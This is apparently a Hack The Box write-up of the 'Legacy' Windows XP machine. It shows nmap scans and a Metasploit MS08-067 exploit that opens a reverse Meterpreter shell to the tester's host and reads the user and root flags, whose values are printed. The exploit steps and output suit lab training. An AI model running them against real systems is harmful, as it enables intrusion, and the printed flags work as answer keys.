Legacy

Executive Summary

Legacy is a fairly straightforward beginner-level machine that demonstrates the potential security risks of SMB on Windows. Only one publicly available exploit is required to obtain administrator access.

Machine Information

• Machine Name: Legacy

• OS: Windows

• Difficulty: Easy

• IP Address: 10.129.3.61

• Date Completed: 05/01/2025

Reconnaissance

Port Scanning

Document nmap scans and other reconnaissance activities.

nmap -sCV -oA nmap/initial 10.129.3.61
Host: 10.129.3.61 ()	Ports: 
                        135/open/tcp//msrpc//Microsoft Windows RPC/
                        139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/
                        445/open/tcp//microsoft-ds//Windows XP microsoft-ds/
Host script results:
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\\x00
|   Workgroup: HTB\\x00
|_  System time: 2026-01-10T10:06:46+02:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 44351/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 62500/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 29483/udp): CLEAN (Failed to receive data)
|   Check 4 (port 35958/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:ed:3b (VMware)
| Names:
|   
| Statistics:
|   00:50:56:b9:ed:3b:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h57m51s, deviation: 1h24m51s, median: 4d23h57m51s

Open Ports

Port	Service
135	Microsoft Windows RPC
139	Microsoft Windows netbios-ssn
445	Windows XP microsoft-ds

Service Enumeration

It can be seen that SMBc2 is running on the target machine. So, we can use nmap scripts to determine whether the target is vulnerable.

nmap --script=smb-vuln* 10.129.3.61

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>
|       <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>
|_      <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       <https://technet.microsoft.com/en-us/library/security/ms08-067.aspx>
|_      <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250>
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false

Initial Access

Vulnerability Identified

The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code through a crafted RPC request that triggers an overflow during path canonicalization.

• CVE/Vulnerability: CVE-2008-4250

• Attack Vector: RPC request

• Exploitation Method: execute arbitrary code

Exploitation Steps

1. Running using Rapid7 (metasploit) with windows/smb/ms08_067_netapi

2. Set RHOST and LHOST to respective value

3. Run the exploit

Proof of Concept

msf exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 10.10.14.23:4444 
[*] 10.129.3.61:445 - Automatically detecting the target...
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.24/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 10.129.3.61:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.3.61:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.3.61:445 - Attempting to trigger the vulnerability...
[*] Sending stage (188998 bytes) to 10.129.3.61
[*] Meterpreter session 1 opened (10.10.14.23:4444 -> 10.129.3.61:1046) at 2026-01-05 14:34:17 +0800
meterpreter > cat "c:/Documents and Settings/john/desktop/user.txt"
e69af0e4f443de7e36876fda4ec7644f
meterpreter > cat "c:/Documents and Settings/administrator/desktop/root.txt"
993442d258b0e0ec917cae9e695d5713
meterpreter > 

User Flag

Document how user access was obtained and the user flag captured.

• Username: john

• Flag Location:c:/Documents and Settings/john/desktop/user.txt

• Flag: e69af0e4f443de7e36876fda4ec7644f

Root Flag

Document root access achievement.

• Flag Location: c:/Documents and Settings/administrator/desktop/root.txt

• Flag: 993442d258b0e0ec917cae9e695d5713

Key Learnings

Technical Skills

• Legacy windows are exposed to a critical vulnerability

References

• CVE-2008-4250

• Exploit-DB links